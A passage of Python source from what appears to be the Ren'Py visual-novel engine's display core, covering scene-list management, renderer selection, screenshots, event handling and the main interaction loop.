for l, ll in self.layers.iteritems():
self.layers[l] = [ i.update_time(time) for i in ll ]
def showing(self, layer, name):
"""
Returns true if something with the prefix of the given name
is found in the scene list.
"""
return self.shown.showing(layer, name)
def get_showing_tags(self, layer):
return self.shown.get_showing_tags(layer)
def get_sorted_tags(self, layer):
rv = [ ]
for sle in self.layers[layer]:
if not sle.tag:
continue
if "$" in sle.tag:
continue
rv.append(sle.tag)
return rv
def make_layer(self, layer, properties):
"""
Creates a Fixed with the given layer name and scene_list.
"""
rv = renpy.display.layout.MultiBox(layout='fixed', focus=layer, **properties)
rv.append_scene_list(self.layers[layer])
rv.layer_name = layer
rv._duplicatable = False
time, at_list = self.layer_at_list[layer]
old_transform = self.layer_transform.get(layer, None)
new_transform = None
if at_list:
for a in at_list:
if isinstance(a, renpy.display.motion.Transform):
rv = a(child=rv)
new_transform = rv
else:
rv = a(rv)
if (new_transform is not None) and (renpy.config.keep_show_layer_state):
self.transform_state(old_transform, new_transform, execution=True)
f = renpy.display.layout.MultiBox(layout='fixed')
f.add(rv, time, time)
f.layer_name = layer
rv = f
self.layer_transform[layer] = new_transform
return rv
def remove_hide_replaced(self, layer, tag):
"""
Removes things that are hiding or replaced, that have the given
tag.
"""
hide_tag = "hide$" + tag
replaced_tag = "replaced$" + tag
l = self.layers[layer]
self.layers[layer] = [ i for i in l if i.tag != hide_tag and i.tag != replaced_tag ]
def remove_hidden(self):
"""
Goes through all of the layers, and removes things that are
hidden and are no longer being kept alive by their hide
methods.
"""
now = get_time()
for l in self.layers:
newl = [ ]
for sle in self.layers[l]:
if sle.tag:
if sle.tag.startswith("hide$"):
d = sle.displayable._hide(now - sle.show_time, now - sle.animation_time, "hide")
if not d:
continue
elif sle.tag.startswith("replaced$"):
d = sle.displayable._hide(now - sle.show_time, now - sle.animation_time, "replaced")
if not d:
continue
newl.append(sle)
self.layers[l] = newl
def remove_all_hidden(self):
"""
Removes everything hidden, even if it's not time yet. (Used when making a rollback copy).
"""
for l in self.layers:
newl = [ ]
for sle in self.layers[l]:
if sle.tag:
if "$" in sle.tag:
continue
newl.append(sle)
self.layers[l] = newl
def get_displayable_by_tag(self, layer, tag):
"""
Returns the displayable on the layer with the given tag, or None
if no such displayable exists. Note that this will usually return
a Transform.
"""
if layer not in self.layers:
raise Exception("Unknown layer %r." % layer)
for sle in self.layers[layer]:
if sle.tag == tag:
return sle.displayable
return None
def get_displayable_by_name(self, layer, name):
"""
Returns the displayable on the layer with the given name, or None
if no such displayable exists. Note that this will usually return
a Transform.
"""
if layer not in self.layers:
raise Exception("Unknown layer %r." % layer)
for sle in self.layers[layer]:
if sle.name == name:
return sle.displayable
return None
def get_image_bounds(self, layer, tag, width, height):
"""
Implements renpy.get_image_bounds().
"""
if layer not in self.layers:
raise Exception("Unknown layer %r." % layer)
for sle in self.layers[layer]:
if sle.tag == tag:
break
else:
return None
now = get_time()
if sle.show_time is not None:
st = now - sle.show_time
else:
st = 0
if sle.animation_time is not None:
at = now - sle.animation_time
else:
at = 0
surf = renpy.display.render.render_for_size(sle.displayable, width, height, st, at)
sw = surf.width
sh = surf.height
x, y = place(width, height, sw, sh, sle.displayable.get_placement())
return (x, y, sw, sh)
def scene_lists(index=-1):
"""
Returns either the current scenelists object, or the one for the
context at the given index.
"""
return renpy.game.context(index).scene_lists
class MouseMove(object):
"""
This contains information about the current mouse move.
"""
def __init__(self, x, y, duration):
self.start = get_time()
if duration is not None:
self.duration = duration
else:
self.duration = 0
self.start_x, self.start_y = renpy.display.draw.get_mouse_pos()
self.end_x = x
self.end_y = y
def perform(self):
"""
Performs the mouse move. Returns True if this should be called
again, or False if the move has finished.
"""
elapsed = get_time() - self.start
if elapsed >= self.duration:
renpy.display.draw.set_mouse_pos(self.end_x, self.end_y)
return False
done = 1.0 * elapsed / self.duration
x = int(self.start_x + done * (self.end_x - self.start_x))
y = int(self.start_y + done * (self.end_y - self.start_y))
renpy.display.draw.set_mouse_pos(x, y)
return True
def get_safe_mode():
"""
Returns true if we should go into safe mode.
"""
if renpy.safe_mode_checked:
return False
try:
if renpy.windows:
import ctypes
VK_SHIFT = 0x10
ctypes.windll.user32.GetKeyState.restype = ctypes.c_ushort
if ctypes.windll.user32.GetKeyState(VK_SHIFT) & 0x8000:
return True
else:
return False
# Safe mode doesn't work on other platforms.
return False
except:
return False
# How long should we be in maximum framerate mode at the start of the game?
initial_maximum_framerate = 0.0
class Interface(object):
"""
This represents the user interface that interacts with the user.
It manages the Display objects that display things to the user, and
also handles accepting and responding to user input.
@ivar display: The display that we used to display the screen.
@ivar profile_time: The time of the last profiling.
@ivar screenshot: A screenshot, or None if no screenshot has been
taken.
@ivar old_scene: The last thing that was displayed to the screen.
@ivar transition: A map from layer name to the transition that will
be applied the next time interact restarts.
@ivar transition_time: A map from layer name to the time the transition
involving that layer started.
@ivar transition_from: A map from layer name to the scene that we're
transitioning from on that layer.
@ivar suppress_transition: If True, then the next transition will not
happen.
@ivar force_redraw: If True, a redraw is forced.
@ivar restart_interaction: If True, the current interaction will
be restarted.
@ivar pushed_event: If not None, an event that was pushed back
onto the stack.
@ivar mouse: The name of the mouse cursor to use during the current
interaction.
@ivar ticks: The number of 20hz ticks.
@ivar frame_time: The time at which we began drawing this frame.
@ivar interact_time: The time of the start of the first frame of the current interact_core.
@ivar time_event: A singleton ignored event.
@ivar event_time: The time of the current event.
@ivar timeout_time: The time at which the timeout will occur.
"""
def __init__(self):
# PNG data and the surface for the current file screenshot.
self.screenshot = None
self.screenshot_surface = None
self.old_scene = { }
self.transition = { }
self.ongoing_transition = { }
self.transition_time = { }
self.transition_from = { }
self.suppress_transition = False
self.quick_quit = False
self.force_redraw = False
self.restart_interaction = False
self.pushed_event = None
self.ticks = 0
self.mouse = 'default'
self.timeout_time = None
self.last_event = None
self.current_context = None
self.roll_forward = None
# Things to be preloaded.
self.preloads = [ ]
# The time at which this draw occurs.
self.frame_time = 0
# The time when this interaction occured.
self.interact_time = None
# The time we last tried to quit.
self.quit_time = 0
# Are we currently processing the quit event?
self.in_quit_event = False
self.time_event = pygame.event.Event(TIMEEVENT)
self.redraw_event = pygame.event.Event(REDRAW)
# Are we focused?
self.mouse_focused = True
self.keyboard_focused = True
# Properties for each layer.
self.layer_properties = { }
# Have we shown the window this interaction?
self.shown_window = False
# Are we in fullscren mode?
self.fullscreen = False
# Should we ignore the rest of the current touch? Used to ignore the
# rest of a mousepress after a longpress occurs.
self.ignore_touch = False
# Should we clear the screenshot at the start of the next interaction?
self.clear_screenshot = False
for layer in renpy.config.layers + renpy.config.top_layers:
if layer in renpy.config.layer_clipping:
x, y, w, h = renpy.config.layer_clipping[layer]
self.layer_properties[layer] = dict(
xpos=x,
xanchor=0,
ypos=y,
yanchor=0,
xmaximum=w,
ymaximum=h,
xminimum=w,
yminimum=h,
clipping=True,
)
else:
self.layer_properties[layer] = dict()
# A stack giving the values of self.transition and self.transition_time
# for contexts outside the current one. This is used to restore those
# in the case where nothing has changed in the new context.
self.transition_info_stack = [ ]
# The time when the event was dispatched.
self.event_time = 0
# The time we saw the last mouse event.
self.mouse_event_time = None
# Should we show the mouse?
self.show_mouse = True
# Should we reset the display?
self.display_reset = False
# The last size we were resized to.
self.last_resize = None
# The thread that can do display operations.
self.thread = threading.current_thread()
# Initialize audio.
renpy.audio.audio.init()
# Initialize pygame.
try:
pygame.display.init()
except:
pass
# Init timing.
init_time()
self.mouse_event_time = get_time()
# The current window caption.
self.window_caption = None
renpy.game.interface = self
renpy.display.interface = self
# Are we in safe mode, from holding down shift at start?
self.safe_mode = False
# Do we need a background screenshot?
self.bgscreenshot_needed = False
# Event used to signal background screenshot taken.
self.bgscreenshot_event = threading.Event()
# The background screenshot surface.
self.bgscreenshot_surface = None
# Mouse move. If not None, information about the current mouse
# move.
self.mouse_move = None
# If in text editing mode, the current text editing event.
self.text_editing = None
# The text rectangle after the current draw.
self.text_rect = None
# The text rectangle after the previous draw.
self.old_text_rect = None
# Are we a touchscreen?
self.touch = renpy.exports.variant("touch")
# Should we restart the interaction?
self.restart_interaction = True
# For compatibility with older code.
if renpy.config.periodic_callback:
renpy.config.periodic_callbacks.append(renpy.config.periodic_callback)
renpy.display.emulator.init_emulator()
# Has start been called?
self.started = False
# Are we in fullscreen video mode?
self.fullscreen_video = False
self.safe_mode = get_safe_mode()
renpy.safe_mode_checked = True
# A scale factor used to compensate for the system DPI.
self.dpi_scale = self.setup_dpi_scaling()
renpy.display.log.write("DPI scale factor: %f", self.dpi_scale)
# A time until which we should draw at maximum framerate.
self.maximum_framerate_time = 0.0
self.maximum_framerate(initial_maximum_framerate)
# True if this is the first interact.
self.start_interact = True
# The time of each frame.
self.frame_times = [ ]
# The duration of each frame, in seconds.
self.frame_duration = 1.0 / 60.0
def setup_dpi_scaling(self):
if "RENPY_HIGHDPI" in os.environ:
return float(os.environ["RENPY_HIGHDPI"])
if not renpy.windows:
return 1.0
try:
import ctypes
from ctypes import c_void_p, c_int
ctypes.windll.user32.SetProcessDPIAware()
GetDC = ctypes.windll.user32.GetDC
GetDC.restype = c_void_p
GetDC.argtypes = [ c_void_p ]
ReleaseDC = ctypes.windll.user32.ReleaseDC
ReleaseDC.argtypes = [ c_void_p, c_void_p ]
GetDeviceCaps = ctypes.windll.gdi32.GetDeviceCaps
GetDeviceCaps.restype = c_int
GetDeviceCaps.argtypes = [ c_void_p, c_int ]
LOGPIXELSX = 88
dc = GetDC(None)
rv = GetDeviceCaps(dc, LOGPIXELSX) / 96.0
ReleaseDC(None, dc)
if rv < renpy.config.de_minimus_dpi_scale:
renpy.display.log.write("De minimus DPI scale, was %r", rv)
rv = 1.0
return rv
except:
renpy.display.log.write("Could not determine DPI scale factor:")
renpy.display.log.exception()
return 1.0
def start(self):
"""
Starts the interface, by opening a window and setting the mode.
"""
if self.started:
return
gc.collect()
if gc.garbage:
gc.garbage[:] = [ ]
renpy.display.render.render_ready()
# Kill off the presplash.
renpy.display.presplash.end()
renpy.main.log_clock("Interface start")
self.started = True
self.set_mode()
# Load the image fonts.
renpy.text.font.load_fonts()
# Setup periodic event.
pygame.time.set_timer(PERIODIC, PERIODIC_INTERVAL)
# Don't grab the screen.
pygame.event.set_grab(False)
if not self.safe_mode:
renpy.display.controller.init()
s = "Total time until interface ready: {}s".format(time.time() - import_time)
renpy.display.log.write(s)
if renpy.android and not renpy.config.log_to_stdout:
print(s)
def post_init(self):
"""
This is called after display init, but before the window is created.
"""
pygame.display.hint("SDL_VIDEO_MINIMIZE_ON_FOCUS_LOSS", "0")
# Needed for Unity.
wmclass = renpy.config.save_directory or os.path.basename(sys.argv[0])
os.environ[b'SDL_VIDEO_X11_WMCLASS'] = wmclass.encode("utf-8")
self.set_window_caption(force=True)
self.set_icon()
if renpy.config.key_repeat is not None:
delay, repeat_delay = renpy.config.key_repeat
pygame.key.set_repeat(int(1000 * delay), int(1000 * repeat_delay))
if android:
android.wakelock(True)
# Block events we don't use.
for i in pygame.event.get_standard_events():
if i in enabled_events:
continue
if i in renpy.config.pygame_events:
continue
pygame.event.set_blocked(i)
def set_icon(self):
"""
This is called to set up the window icon.
"""
# Window icon.
icon = renpy.config.window_icon
if icon:
im = renpy.display.scale.image_load_unscaled(
renpy.loader.load(icon),
icon,
)
# Convert the aspect ratio to be square.
iw, ih = im.get_size()
imax = max(iw, ih)
square_im = renpy.display.pgrender.surface_unscaled((imax, imax), True)
square_im.blit(im, ( (imax-iw)/2, (imax-ih)/2 ))
im = square_im
pygame.display.set_icon(im)
def set_window_caption(self, force=False):
window_title = renpy.config.window_title
if window_title is None:
window_title = "A Ren'Py Game"
caption = renpy.translation.translate_string(window_title) + renpy.store._window_subtitle
if renpy.exports.get_autoreload():
caption += " - autoreload"
if not force and caption == self.window_caption:
return
self.window_caption = caption
pygame.display.set_caption(caption.encode("utf-8"))
def iconify(self):
pygame.display.iconify()
def get_draw_constructors(self):
"""
Figures out the list of draw constructors to try.
"""
renderer = renpy.game.preferences.renderer
renderer = os.environ.get("RENPY_RENDERER", renderer)
if self.safe_mode:
renderer = "sw"
if (renderer == "angle") and (not renpy.windows):
renderer = "auto"
renpy.config.renderer = renderer
if renderer == "auto":
if renpy.windows:
renderers = [ "gl", "angle", "sw" ]
else:
renderers = [ "gl", "sw" ]
if renpy.config.gl2:
renderers = [ "gl2", "egl2" ] + renderers
else:
renderers = [ renderer, "sw" ]
draw_objects = { }
def make_draw(name, mod, cls, *args):
if name not in renderers:
return False
try:
__import__(mod)
module = sys.modules[mod]
draw_class = getattr(module, cls)
draw_objects[name] = draw_class(*args)
return True
except:
renpy.display.log.write("Couldn't import {0} renderer:".format(name))
renpy.display.log.exception()
return False
if renpy.windows:
has_angle = make_draw("angle", "renpy.angle.gldraw", "GLDraw")
else:
has_angle = False
make_draw("gl", "renpy.gl.gldraw", "GLDraw", not has_angle)
make_draw("gl2", "renpy.gl2.gl2draw", "GL2Draw", "gl2", False)
make_draw("gles2", "renpy.gl2.gl2draw", "GL2Draw", "gles2", True)
make_draw("sw", "renpy.display.swdraw", "SWDraw")
rv = [ ]
def append_draw(name):
if name in draw_objects:
rv.append(draw_objects[name])
else:
renpy.display.log.write("Unknown renderer: {0}".format(name))
for i in renderers:
append_draw(i)
return rv
def kill_textures(self):
if renpy.display.draw is not None:
renpy.display.draw.kill_textures()
renpy.display.render.free_memory()
renpy.text.text.layout_cache_clear()
def kill_textures_and_surfaces(self):
"""
Kill all textures and surfaces that are loaded.
"""
self.kill_textures()
renpy.display.im.cache.clear()
renpy.display.module.bo_cache = None
def set_mode(self, physical_size=None):
"""
This sets the video mode. It also picks the draw object.
"""
# Ensure that we kill off the movie when changing screen res.
if renpy.display.draw and renpy.display.draw.info["renderer"] == "sw":
renpy.display.video.movie_stop(clear=False)
renpy.display.render.free_memory()
renpy.text.text.layout_cache_clear()
renpy.display.module.bo_cache = None
if self.display_reset:
pygame.key.stop_text_input() # @UndefinedVariable
pygame.key.set_text_input_rect(None) # @UndefinedVariable
self.text_rect = None
if renpy.display.draw.info["renderer"] == "angle":
renpy.display.draw.quit()
# This is necessary to fix a bug with restoring a window from
# minimized state on windows.
pygame.display.quit()
self.kill_textures_and_surfaces()
self.old_text_rect = None
self.display_reset = False
virtual_size = (renpy.config.screen_width, renpy.config.screen_height)
if physical_size is None:
if renpy.mobile or renpy.game.preferences.physical_size is None: # @UndefinedVariable
physical_size = (None, None)
else:
physical_size = renpy.game.preferences.physical_size
# Setup screen.
fullscreen = renpy.game.preferences.fullscreen
old_fullscreen = self.fullscreen
self.fullscreen = fullscreen
if os.environ.get('RENPY_DISABLE_FULLSCREEN', False):
fullscreen = False
self.fullscreen = renpy.game.preferences.fullscreen
if renpy.display.draw:
draws = [ renpy.display.draw ]
else:
draws = self.get_draw_constructors()
for draw in draws:
if draw.set_mode(virtual_size, physical_size, fullscreen):
renpy.display.draw = draw
renpy.display.render.models = draw.info.get("models", False)
break
else:
# pygame.display.quit()
pass
else:
# Ensure we don't get stuck in fullscreen.
renpy.game.preferences.fullscreen = False
raise Exception("Could not set video mode.")
# Save the video size.
if renpy.config.save_physical_size and not fullscreen and not old_fullscreen:
renpy.game.preferences.physical_size = renpy.display.draw.get_physical_size()
if android:
android.init()
# We need to redraw the (now blank) screen.
self.force_redraw = True
# Assume we have focus until told otherwise.
self.mouse_focused = True
self.keyboard_focused = True
# Assume we're not minimized.
self.minimized = False
# Force an interaction restart.
self.restart_interaction = True
# True if we're doing a one-time profile.
self.profile_once = False
# Clear the frame times.
self.frame_times = [ ]
def draw_screen(self, root_widget, fullscreen_video, draw):
try:
renpy.display.render.per_frame = True
renpy.display.screen.per_frame()
finally:
renpy.display.render.per_frame = False
surftree = renpy.display.render.render_screen(
root_widget,
renpy.config.screen_width,
renpy.config.screen_height,
)
if draw:
renpy.display.draw.draw_screen(surftree, fullscreen_video)
now = time.time()
self.frame_times.append(now)
while (now - self.frame_times[0]) > renpy.config.performance_window:
self.frame_times.pop(0)
renpy.display.render.mark_sweep()
renpy.display.focus.take_focuses()
self.surftree = surftree
self.fullscreen_video = fullscreen_video
def take_screenshot(self, scale, background=False):
"""
This takes a screenshot of the current screen, and stores it so
that it can gotten using get_screenshot()
`background`
If true, we're in a background thread. So queue the request
until it can be handled by the main thread.
"""
self.clear_screenshot = False
# Do nothing before the first interaction.
if not self.started:
return
if background and not renpy.emscripten:
self.bgscreenshot_event.clear()
self.bgscreenshot_needed = True
if not self.bgscreenshot_event.wait(1.0):
raise Exception("Screenshot timed out.")
surf = self.bgscreenshot_surface
self.bgscreenshot_surface = None
else:
surf = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
surf = renpy.display.scale.smoothscale(surf, scale)
renpy.display.render.mutated_surface(surf)
self.screenshot_surface = surf
sio = cStringIO.StringIO()
renpy.display.module.save_png(surf, sio, 0)
self.screenshot = sio.getvalue()
sio.close()
def check_background_screenshot(self):
"""
Handles requests for a background screenshot.
"""
if self.bgscreenshot_needed:
self.bgscreenshot_needed = False
self.bgscreenshot_surface = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
self.bgscreenshot_event.set()
def get_screenshot(self):
"""
Gets the current screenshot, as a string. Returns None if there isn't
a current screenshot.
"""
if not self.started:
self.start()
rv = self.screenshot
if not rv:
self.take_screenshot(
(renpy.config.thumbnail_width, renpy.config.thumbnail_height),
background=(threading.current_thread() is not self.thread),
)
rv = self.screenshot
self.lose_screenshot()
return rv
def lose_screenshot(self):
"""
This deallocates the saved screenshot.
"""
self.screenshot = None
self.screenshot_surface = None
def save_screenshot(self, filename):
"""
Saves a full-size screenshot in the given filename.
"""
window = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
if renpy.config.screenshot_crop:
window = window.subsurface(renpy.config.screenshot_crop)
try:
renpy.display.scale.image_save_unscaled(window, filename)
if renpy.emscripten:
import emscripten
emscripten.run_script(r'''FSDownload('%s')''' % filename)
return True
except:
if renpy.config.debug:
raise
return False
def show_window(self):
if not renpy.store._window:
return
if not renpy.game.preferences.show_empty_window:
return
if renpy.game.context().scene_lists.shown_window:
return
if renpy.config.empty_window:
old_history = renpy.store._history # @UndefinedVariable
renpy.store._history = False
PPP("empty window")
try:
renpy.config.empty_window()
finally:
renpy.store._history = old_history
def do_with(self, trans, paired, clear=False):
if renpy.config.with_callback:
trans = renpy.config.with_callback(trans, paired)
if (not trans) or self.suppress_transition:
self.with_none()
return False
else:
self.set_transition(trans)
return self.interact(trans_pause=True,
suppress_overlay=not renpy.config.overlay_during_with,
mouse='with',
clear=clear)
def with_none(self, overlay=True):
"""
Implements the with None command, which sets the scene we will
be transitioning from.
"""
PPP("start of with none")
renpy.game.context().say_attributes = None
# Show the window, if that's necessary.
self.show_window()
# Compute the overlay.
if overlay:
self.compute_overlay()
scene_lists = renpy.game.context().scene_lists
# Compute the scene.
for layer, d in self.compute_scene(scene_lists).iteritems():
if layer not in self.transition:
self.old_scene[layer] = d
# Get rid of transient things.
for i in renpy.config.overlay_layers:
scene_lists.clear(i)
scene_lists.replace_transient()
scene_lists.shown_window = False
if renpy.store._side_image_attributes_reset:
renpy.store._side_image_attributes = None
renpy.store._side_image_attributes_reset = False
def set_transition(self, transition, layer=None, force=False):
"""
Sets the transition that will be performed as part of the next
interaction.
"""
if self.suppress_transition and not force:
return
if transition is None:
self.transition.pop(layer, None)
else:
self.transition[layer] = transition
def event_peek(self):
"""
This peeks the next event. It returns None if no event exists.
"""
if self.pushed_event:
return self.pushed_event
ev = pygame.event.poll()
if ev.type == pygame.NOEVENT:
self.check_background_screenshot()
# Seems to prevent the CPU from speeding up.
renpy.display.draw.event_peek_sleep()
return None
self.pushed_event = ev
return ev
def event_poll(self):
"""
Called to busy-wait for an event while we're waiting to
redraw a frame.
"""
if self.pushed_event:
rv = self.pushed_event
self.pushed_event = None
else:
rv = pygame.event.poll()
self.last_event = rv
return rv
def event_wait(self):
"""
This is in its own function so that we can track in the
profiler how much time is spent in interact.
"""
if self.pushed_event:
rv = self.pushed_event
self.pushed_event = None
self.last_event = rv
return rv
self.check_background_screenshot()
ev = pygame.event.wait()
self.last_event = ev
return ev
def compute_overlay(self):
if renpy.store.suppress_overlay:
return
# Figure out what the overlay layer should look like.
renpy.ui.layer("overlay")
for i in renpy.config.overlay_functions:
i()
if renpy.game.context().scene_lists.shown_window:
for i in renpy.config.window_overlay_functions:
i()
renpy.ui.close()
def compute_scene(self, scene_lists):
"""
This converts scene lists into a dictionary mapping layer
name to a Fixed containing that layer.
"""
rv = { }
for layer in renpy.config.layers + renpy.config.top_layers:
rv[layer] = scene_lists.make_layer(layer, self.layer_properties[layer])
root = renpy.display.layout.MultiBox(layout='fixed')
root.layers = { }
for layer in renpy.config.layers:
root.layers[layer] = rv[layer]
root.add(rv[layer])
rv[None] = root
return rv
def quit_event(self):
"""
This is called to handle the user invoking a quit.
"""
if self.screenshot is None:
renpy.exports.take_screenshot()
if self.quit_time > (time.time() - .75):
renpy.exports.quit(save=True)
if self.in_quit_event:
renpy.exports.quit(save=True)
if renpy.config.quit_action is not None:
self.quit_time = time.time()
# Make the screen more suitable for interactions.
renpy.exports.movie_stop(only_fullscreen=True)
renpy.store.mouse_visible = True
try:
self.in_quit_event = True
renpy.display.behavior.run(renpy.config.quit_action)
finally:
self.in_quit_event = False
else:
renpy.exports.quit(save=True)
def get_mouse_info(self):
# Figure out if the mouse visibility algorithm is hiding the mouse.
if (renpy.config.mouse_hide_time is not None) and (self.mouse_event_time + renpy.config.mouse_hide_time < renpy.display.core.get_time()):
visible = False
else:
visible = renpy.store.mouse_visible and (not renpy.game.less_mouse)
visible = visible and self.show_mouse and not (renpy.display.video.fullscreen)
# If not visible, hide the mouse.
if not visible:
return False, 0, 0, None
# Deal with a hardware mouse, the easy way.
if not renpy.config.mouse:
return True, 0, 0, None
# Deal with the mouse going offscreen.
if not self.mouse_focused:
return False, 0, 0, None
mouse_kind = renpy.display.focus.get_mouse() or self.mouse
# Figure out the mouse animation.
if mouse_kind in renpy.config.mouse:
anim = renpy.config.mouse[mouse_kind]
else:
anim = renpy.config.mouse[getattr(renpy.store, 'default_mouse', 'default')]
img, x, y = anim[self.ticks % len(anim)]
rend = renpy.display.im.load_image(img)
tex = rend.children[0][0]
xo = rend.children[0][1]
yo = rend.children[0][2]
return False, x - xo, y - yo, tex
def set_mouse_pos(self, x, y, duration):
"""
Sets the mouse position. Duration can be a number of seconds or
None.
"""
self.mouse_move = MouseMove(x, y, duration)
self.force_redraw = True
def drawn_since(self, seconds_ago):
"""
Returns true if the screen has been drawn in the last `seconds_ago`,
and false otherwise.
"""
return (get_time() - self.frame_time) <= seconds_ago
def check_suspend(self, ev):
"""
Handles the SDL2 suspend process.
"""
def save():
if renpy.config.save_on_mobile_background and (not renpy.store.main_menu):
renpy.loadsave.save("_reload-1")
renpy.persistent.update(True)
if ev.type == pygame.APP_TERMINATING:
save()
sys.exit(0)
if ev.type != pygame.APP_WILLENTERBACKGROUND:
return False
# At this point, we're about to enter the background.
renpy.audio.audio.pause_all()
if android:
android.wakelock(False)
pygame.time.set_timer(PERIODIC, 0)
pygame.time.set_timer(REDRAW, 0)
pygame.time.set_timer(TIMEEVENT, 0)
save()
if renpy.config.quit_on_mobile_background:
sys.exit(0)
renpy.exports.free_memory()
print("Entered background.")
while True:
ev = pygame.event.wait()
if ev.type == pygame.APP_DIDENTERFOREGROUND:
break
if ev.type == pygame.APP_TERMINATING:
sys.exit(0)
print("Entering foreground.")
# Since we came back to life, we can get rid of the
# auto-reload.
renpy.loadsave.unlink_save("_reload-1")
pygame.time.set_timer(PERIODIC, PERIODIC_INTERVAL)
renpy.audio.audio.unpause_all()
if android:
android.wakelock(True)
# Reset the display so we get the GL context back.
self.display_reset = True
self.restart_interaction = True
return True
def iconified(self):
"""
Called when we become an icon.
"""
if self.minimized:
return
self.minimized = True
renpy.display.log.write("The window was minimized.")
def restored(self):
"""
Called when we are restored from being an icon.
"""
# This is necessary on Windows/DirectX/Angle, as otherwise we get
# a blank screen.
if not self.minimized:
return
self.minimized = False
renpy.display.log.write("The window was restored.")
if renpy.windows:
self.display_reset = True
self.set_mode(self.last_resize)
def enter_context(self):
"""
Called when we enter a new context.
"""
# Stop ongoing transitions.
self.ongoing_transition.clear()
self.transition_from.clear()
self.transition_time.clear()
def post_time_event(self):
"""
Posts a time_event object to the queue.
"""
try:
pygame.event.post(self.time_event)
except:
pass
def after_longpress(self):
"""
Called after a longpress, to ignore the mouse button release.
"""
self.ignore_touch = True
renpy.display.focus.mouse_handler(None, -1, -1, default=False)
def text_event_in_queue(self):
"""
Returns true if the next event in the queue is a text editing event.
"""
ev = self.event_peek()
if ev is None:
return False
else:
return ev.type in (pygame.TEXTINPUT, pygame.TEXTEDITING)
def update_text_rect(self):
"""
Updates the text input state and text rectangle.
"""
if renpy.store._text_rect is not None: # @UndefinedVariable
self.text_rect = renpy.store._text_rect # @UndefinedVariable
if self.text_rect is not None:
not_shown = pygame.key.has_screen_keyboard_support() and not pygame.key.is_screen_keyboard_shown() # @UndefinedVariable
if self.old_text_rect != self.text_rect:
x, y, w, h = self.text_rect
x0, y0 = renpy.display.draw.untranslate_point(x, y)
x1, y1 = renpy.display.draw.untranslate_point(x + w, y + h)
rect = (x0, y0, x1 - x0, y1 - y0)
pygame.key.set_text_input_rect(rect) # @UndefinedVariable
if not self.old_text_rect or not_shown:
pygame.key.start_text_input() # @UndefinedVariable
else:
if self.old_text_rect:
pygame.key.stop_text_input() # @UndefinedVariable
pygame.key.set_text_input_rect(None) # @UndefinedVariable
self.old_text_rect = self.text_rect
def maximum_framerate(self, t):
"""
Forces Ren'Py to draw the screen at the maximum framerate for `t` seconds.
"""
if t is None:
self.maximum_framerate_time = 0
else:
self.maximum_framerate_time = max(self.maximum_framerate_time, get_time() + t)
def interact(self, clear=True, suppress_window=False, trans_pause=False, **kwargs):
"""
This handles an interaction, restarting it if necessary. All of the
keyword arguments are passed off to interact_core.
"""
renpy.plog(1, "start of new interaction")
if not self.started:
self.start()
if self.clear_screenshot:
self.lose_screenshot()
self.clear_screenshot = False
self.trans_pause = trans_pause
# Cancel magic error reporting.
renpy.bootstrap.report_error = None
context = renpy.game.context()
if context.interacting:
raise Exception("Cannot start an interaction in the middle of an interaction, without creating a new context.")
context.interacting = True
# Show a missing window.
if not suppress_window:
self.show_window()
# These things can be done once per interaction.
preloads = self.preloads
self.preloads = [ ]
try:
for i in renpy.config.start_interact_callbacks:
i()
repeat = True
self.start_interact = True
while repeat:
repeat, rv = self.interact_core(preloads=preloads, trans_pause=trans_pause, **kwargs)
self.start_interact = False
return rv
finally:
context.interacting = False
# Clean out transient stuff at the end of an interaction.
if clear:
scene_lists = renpy.game.context().scene_lists
scene_lists.replace_transient()
self.ongoing_transition = { }
self.transition_time = { }
self.transition_from = { }
self.restart_interaction = True
renpy.game.context().mark_seen()
renpy.game.context().scene_lists.shown_window = False
if renpy.game.log is not None:
renpy.game.log.did_interaction = True
if renpy.store._side_image_attributes_reset:
renpy.store._side_image_attributes = None
renpy.store._side_image_attributes_reset = False
def consider_gc(self):
"""
Considers if we should peform a garbage collection.
"""
if not renpy.config.manage_gc:
return
count = gc.get_count()
if count[0] >= renpy.config.idle_gc_count:
renpy.plog(2, "before gc")
if count[2] >= renpy.config.gc_thresholds[2]:
gen = 2
elif count[1] >= renpy.config.gc_thresholds[1]:
gen = 1
else:
gen = 0
gc.collect(gen)
if gc.garbage:
renpy.memory.print_garbage(gen)
gc.garbage[:] = [ ]
renpy.plog(2, "after gc")
def idle_frame(self, can_block, expensive):
"""
Tasks that are run during "idle" frames.
"""
if expensive:
renpy.plog(1, "start idle_frame (expensive)")
else:
renpy.plog(1, "start idle_frame (inexpensive)")
# We want this to include the GC time, so we don't predict on
# frames where we GC.
start = get_time()
step = 1
while True:
if self.event_peek():
break
if not (can_block and expensive):
if get_time() > (start + .0005):
break
# Step 1: Run gc.
if step == 1:
self.consider_gc()
step += 1
# Step 2: Push textures to GPU.
elif step == 2:
renpy.display.draw.ready_one_texture()
step += 1
# Step 3: Predict more images.
elif step == 3:
if not self.prediction_coroutine:
step += 1
continue
try:
result = self.prediction_coroutine.send(expensive)
except ValueError:
# Saw this happen once during a quit, giving a
# ValueError: generator already executing
result = None
if result is None:
self.prediction_coroutine = None
step += 1
elif result is False:
if not expensive:
step += 1
# Step 4: Preload images (on emscripten)
elif step == 4:
if expensive and renpy.emscripten:
renpy.display.im.cache.preload_thread_pass()
step += 1
# Step 5: Autosave.
elif step == 5:
if not self.did_autosave:
renpy.loadsave.autosave()
renpy.persistent.check_update()
self.did_autosave = True
step += 1
else:
break
if expensive:
renpy.plog(1, "end idle_frame (expensive)")
else:
renpy.plog(1, "end idle_frame (inexpensive)")
def interact_core(self,
show_mouse=True,
trans_pause=False,
suppress_overlay=False,
suppress_underlay=False,
mouse='default',
preloads=[],
roll_forward=None,
):
"""
This handles one cycle of displaying an image to the user,
and then responding to user input.
@param show_mouse: Should the mouse be shown during this
interaction? Only advisory, and usually doesn't work.
@param trans_pause: If given, we must have a transition. Should we
add a pause behavior during the transition?
@param suppress_overlay: This suppresses the display of the overlay.
@param suppress_underlay: This suppresses the display of the underlay.
"""
renpy.plog(1, "start interact_core")
suppress_overlay = suppress_overlay or renpy.store.suppress_overlay
# Store the various parameters.
self.suppress_overlay = suppress_overlay
self.suppress_underlay = suppress_underlay
self.trans_pause = trans_pause
# Show default screens.
renpy.display.screen.show_overlay_screens(suppress_overlay)
# Prepare screens, if need be.
renpy.display.screen.prepare_screens()
self.roll_forward = roll_forward
self.show_mouse = show_mouse
suppress_transition = renpy.config.skipping or renpy.game.less_updates
# The global one.
self.suppress_transition = False
# Figure out transitions.
if suppress_transition:
